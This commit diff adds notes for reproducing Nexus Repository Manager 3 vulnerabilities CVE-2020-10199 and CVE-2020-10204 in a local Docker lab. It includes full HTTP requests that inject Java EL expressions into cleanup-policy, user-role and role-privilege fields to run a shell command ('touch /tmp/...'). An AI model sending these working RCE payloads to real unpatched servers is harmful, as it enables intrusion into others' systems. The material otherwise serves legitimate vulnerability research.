feat:nexus CVE-2020-10199

“threedr3am” · “threedr3am” · commit e93a761a1dca · 2020-04-04T16:57:17.000+08:00
diff --git a/nexus/CVE-2020-10199/README.md b/nexus/CVE-2020-10199/README.md
@@ -0,0 +1,102 @@
+CVE-2020-10199 Nexus Repository Manager 3
+
+影响版本：<= 3.21.1
+Affected Versions:  All previous Nexus Repository Manager 3.x OSS/Pro versions up to and including 3.21.1
+
+Fixed in Version:  Nexus Repository Manager OSS/Pro version 3.21.2
+
+### 1. 拉取镜像
+```
+docker pull sonatype/nexus3:3.21.1
+```
+
+### 2. 创建nexus数据目录
+```
+mkdir /your-dir/nexus-data && chown -R 200 /your-dir/nexus-data
+```
+
+### 3. 运行nexus docker镜像
+```
+docker run -d --rm -p 8081:8081 -p 5050:5050 --name nexus -v /your-dir/nexus-data:/nexus-data -e INSTALL4J_ADD_VM_PARAMS="-Xms2g -Xmx2g -XX:MaxDirectMemorySize=3g  -Djava.util.prefs.userRoot=/nexus-data -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050" sonatype/nexus3::3.21.1
+```
+
+### 4. github下载源码 & idea远程debug
+```
+git clone https://github.com/sonatype/nexus-public.git
+git checkout -b release-3.21.0-05 origin/release-3.21.0-05
+```
+idea创建远程debug-启动
+```
+-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5050
+```
+
+### 5. 登陆任何一个账号
+
+### 6. 调用接口
+1. 创建CleanupPolicy：
+```
+POST /service/extdirect HTTP/1.1
+Host: 127.0.0.1:8081
+Content-Length: 381
+Pragma: no-cache
+Cache-Control: no-cache
+Sec-Fetch-Dest: empty
+X-Requested-With: XMLHttpRequest
+X-Nexus-UI: true
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: 0.047908797369389244
+Content-Type: application/json
+Accept: */*
+Origin: http://127.0.0.1:8081
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Referer: http://127.0.0.1:8081/
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.047908797369389244; NXSESSIONID=56f75e54-fa62-43af-8f61-595c1a84c7bc
+Connection: close
+
+{"action":"cleanup_CleanupPolicy","method":"create","data":[{"name":"threedr3am","format":"$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}","notes":"222","mode":"delete","lastBlobUpdatedEnabled":false,"lastDownloadedEnabled":false,"releaseTypeEnabled":false,"regexEnabled":false,"criteria":{}}],"type":"rpc","tid":33}
+```
+
+2. 创建repositories：
+```
+POST /service/rest/beta/repositories/apt/hosted HTTP/1.1
+Host: 127.0.0.1:8081
+Content-Length: 342
+Pragma: no-cache
+Cache-Control: no-cache
+accept: application/json
+Sec-Fetch-Dest: empty
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: 0.047908797369389244
+Content-Type: application/json
+Origin: http://127.0.0.1:8081
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.047908797369389244; NXSESSIONID=56f75e54-fa62-43af-8f61-595c1a84c7bc
+Connection: close
+
+{
+  "name": "interna1l",
+  "online": true,
+  "storage": {
+    "blobStoreName": "default",
+    "strictContentTypeValidation": true,
+    "writePolicy": "allow_once"
+  },
+  "cleanup": {
+    "policyNames": ["threedr3am"]
+  },
+  "apt": {
+    "distribution": "bionic"
+  },
+  "aptSigning": {
+    "keypair": "string",
+    "passphrase": "string"
+  }
+}
+```
diff --git a/nexus/CVE-2020-10204/README.md b/nexus/CVE-2020-10204/README.md
@@ -34,7 +34,7 @@ idea创建远程debug-启动
 ### 5. 登陆任何一个账号
 
 ### 6. 调用更新role接口
-数据包：
+1. 利用更新用户接口：
 ```
 POST /service/extdirect HTTP/1.1
 Host: 127.0.0.1:8081
@@ -54,4 +54,26 @@ Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b
 Connection: close
 
 {"action":"coreui_User","method":"update","data":[{"userId":"www","version":"2","firstName":"www","lastName":"www","email":"www@qq.com","status":"active","roles":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"]}],"type":"rpc","tid":9}
+```
+
+2. 利用创建角色接口：
+```
+POST /service/extdirect HTTP/1.1
+Host: 127.0.0.1:8081
+Content-Length: 294
+accept: application/json
+Sec-Fetch-Dest: empty
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
+NX-ANTI-CSRF-TOKEN: 0.856555763510765
+Content-Type: application/json
+Origin: http://127.0.0.1:8081
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.856555763510765; NXSESSIONID=da418706-f4e4-468e-93ac-de9c46802f11
+Connection: close
+
+{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"],"roles":[]}],"type":"rpc","tid":89}
 ```
